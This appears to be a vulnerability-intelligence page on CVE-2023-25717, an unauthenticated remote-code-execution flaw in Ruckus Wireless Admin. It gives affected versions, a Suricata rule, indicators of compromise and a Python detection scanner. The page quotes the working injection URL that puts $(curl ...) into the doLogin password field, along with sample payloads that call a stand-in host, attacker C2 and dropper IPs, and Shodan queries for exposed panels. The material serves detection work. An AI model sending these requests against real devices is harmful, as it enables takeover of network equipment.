CVE-2023-25717
published 2023-02-13


Priority: P1 (99) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT
CISA Known Exploited Vulnerability, remediation due 2023-06-02
Exploited in the wild
EPSS: 95.11% (99.9th percentile)
Ruckus Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.

Affected (8 ranges)

Vendor          Product                    Version range     Fixed in
commscope       ruckus_smartzone_firmware  < 5.2.1.3         5.2.1.3
commscope       ruckus_smartzone_firmware  < 5.2.1.3.1695    5.2.1.3.1695
commscope       ruckus_smartzone_firmware  -                 -
ruckuswireless  ruckus_wireless_admin      <= 10.4           -
ruckuswireless  smartzone_ap               < 6.1.0.0.9240    6.1.0.0.9240
ruckuswireless  smartzone_ap               < 5.2.2.0.2064    5.2.2.0.2064
ruckuswireless  smartzone_ap               < 3.6.2.0.795     3.6.2.0.795
ruckuswireless  smartzone_ap               < 6.1.1.0.1274    6.1.1.0.1274

Detection & IOCs (extracted from sources)

URL: /forms/doLogin?login_username=admin&password=password$(curl%20{{interactsh-url}})&x=0&y=0
Path: /forms/doLogin
IDS rule (ET Open sid:2045783; written in Suricata's http.method/http.uri sticky-buffer syntax):
alert http any any -> $HOME_NET any (msg:"ET EXPLOIT Ruckus Wireless Admin Remote Code Execution Attempt (CVE 2023-25717)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/forms/doLogin?login_username="; startswith; fast_pattern; content:"&password="; distance:0; content:"|24 28|"; distance:0; content:"|29|"; endswith; reference:cve,2023-25717; classtype:attempted-admin; sid:2045783; rev:1; metadata:affected_product Router, attack_target Networking_Equipment, created_at 2023_05_19, cve CVE_2023_25717, deployment Perimeter, deployment SSLDecrypt, performance_impact Low, confidence High, signature_severity Major, updated_at 2023_05_19, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
Bytes: |24 28| ... |29| (that is, "$(" ... ")")
  • The exploit is an unauthenticated request to /forms/doLogin with shell command injection in the password parameter via $() subshell syntax; login_username=admin in every variant on this page. The NVD description and the Nuclei template use GET, the ET rule above matches POST. Look for the bytes 0x24 0x28 ("$(") in the password value followed by 0x29 (")"), and inspect the URL-decoded value as well, since the same bytes can arrive percent-encoded as %24%28 ... %29.
  • AndoryuBot C2 communication uses SOCKS5 on port 10333 to 45.153.243.39: alert on outbound SOCKS5 connections from Ruckus AP management IPs to that host and port.
  • The AndoryuBot dropper script is fetched from 163.123.142.146 via curl: monitor for outbound HTTP connections from Ruckus APs to that IP.
  • Nuclei template matcher: an HTTP 302 redirect response combined with an interactsh callback whose request contains "user-agent" and "curl" confirms successful RCE via CVE-2023-25717.
  • Shodan/FOFA queries for exposed Ruckus admin panels: title:"ruckus wireless" or http.title:"ruckus wireless" identifies internet-facing targets.
  • The Nuclei PoC confirms RCE through an out-of-band interaction (interactsh); passive network monitoring alone will not confirm exploitation unless the callback itself is observed.
  • The ET rule (sid:2045783) is scoped to the POST method, while the NVD description and Nuclei template exploit via GET, so detections that rely on it alone will miss GET-based attempts. It also requires the URI to end with ")" (endswith), so a request carrying parameters after the password, such as the "&x=0&y=0" in the PoC URL above, does not match it either.
  • The vulnerability affects Ruckus Wireless Admin through version 10.4 and impacts ZoneDirector, SmartZone and Solo APs; the affected range is broad and includes end-of-life products that may not receive patches.
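The detection points above, as an added worked example (not code from this page, from Emerging Threats or from Ruckus): a Python scanner that pulls the password parameter out of a /forms/doLogin request, whether the credentials sit in a GET query string or a POST body and whether or not they are percent-encoded, and flags command-substitution syntax in it. It also approximates the matching conditions of the ET rule so the two can be compared on the same input. The sample requests are constructed, example.invalid stands in for an attacker host, and the ET approximation works on the raw request target rather than Suricata's normalized URI buffer, which is an assumption.

```python
"""Scan HTTP request records for CVE-2023-25717 exploit attempts.

Flags any request to /forms/doLogin (GET or POST, password in the query
string or the body) whose URL-decoded password value carries shell command
substitution ("$(...)" or backticks), so a percent-encoded "%24%28" is
caught as well.  et_rule_matches() approximates ET Open sid:2045783 so the
two detections can be compared on the same records.
"""
import re
from urllib.parse import parse_qs, urlsplit

LOGIN_PATH = "/forms/doLogin"

# "$( ... )" as in the public PoC, plus backtick substitution as a close variant.
SUBSHELL_RE = re.compile(r"\$\([^)]*\)|`[^`]*`")

# Constructed sample requests (method, request-target, body); not captured traffic.
# example.invalid is a reserved name standing in for the attacker host.
SAMPLE_REQUESTS = [
    # Percent-encoded "$(" in a GET, with the PoC's trailing "&x=0&y=0"
    ("GET", "/forms/doLogin?login_username=admin&password=password%24%28curl%20http%3A%2F%2Fexample.invalid%2Fx%29&x=0&y=0", ""),
    # Literal "$(" in a POST query string that ends with ")"
    ("POST", "/forms/doLogin?login_username=admin&password=password$(curl%20http://example.invalid/x)", ""),
    # Credentials carried in the POST body instead of the URI
    ("POST", "/forms/doLogin", "login_username=admin&password=password%24%28id%29"),
    # Benign login whose password merely contains a "$"
    ("GET", "/forms/doLogin?login_username=admin&password=Secret%24Pass%20123&x=0&y=0", ""),
    # Unrelated request
    ("GET", "/index.html", ""),
]


def password_param(target, body=""):
    """Return the URL-decoded password parameter of a /forms/doLogin request, or None."""
    parts = urlsplit(target)
    if parts.path != LOGIN_PATH:
        return None
    # Query-string and body parameters are both form-encoded; merge them.
    query = "&".join(q for q in (parts.query, body) if q)
    values = parse_qs(query, keep_blank_values=True).get("password")
    return values[0] if values else None


def is_exploit_attempt(method, target, body=""):
    """True if the password value carries command-substitution syntax, for any method."""
    password = password_param(target, body)
    return password is not None and SUBSHELL_RE.search(password) is not None


def et_rule_matches(method, target, body=""):
    """Approximate sid:2045783: POST, URI starts with the login prefix, then
    "&password=", then "$(", and the URI must end with ")" (endswith).
    The body is ignored because the rule inspects http.uri only.  Assumption:
    matching on the raw target stands in for Suricata's normalized URI buffer."""
    if method != "POST":
        return False
    prefix = "/forms/doLogin?login_username="
    if not target.startswith(prefix):
        return False
    i = target.find("&password=", len(prefix))
    if i == -1:
        return False
    return target.find("$(", i) != -1 and target.endswith(")")


def scan(records):
    """Return (index, method, target) for every record flagged as an attempt."""
    return [(n, m, t) for n, (m, t, b) in enumerate(records) if is_exploit_attempt(m, t, b)]


if __name__ == "__main__":
    for n, (method, target, body) in enumerate(SAMPLE_REQUESTS):
        flagged = "flagged" if is_exploit_attempt(method, target, body) else "clean"
        et_hit = "hit" if et_rule_matches(method, target, body) else "miss"
        print(n, method, flagged, "| ET rule:", et_hit)
```

On the constructed samples, the scanner flags records 0, 1 and 2 and leaves the benign "$" password alone, while the ET approximation only hits record 1: record 0 is a GET with trailing parameters and record 2 carries the password in the body, which is exactly the gap described in the bullets above.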

CVSS provenance

NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
CISA: 9.8 CRITICAL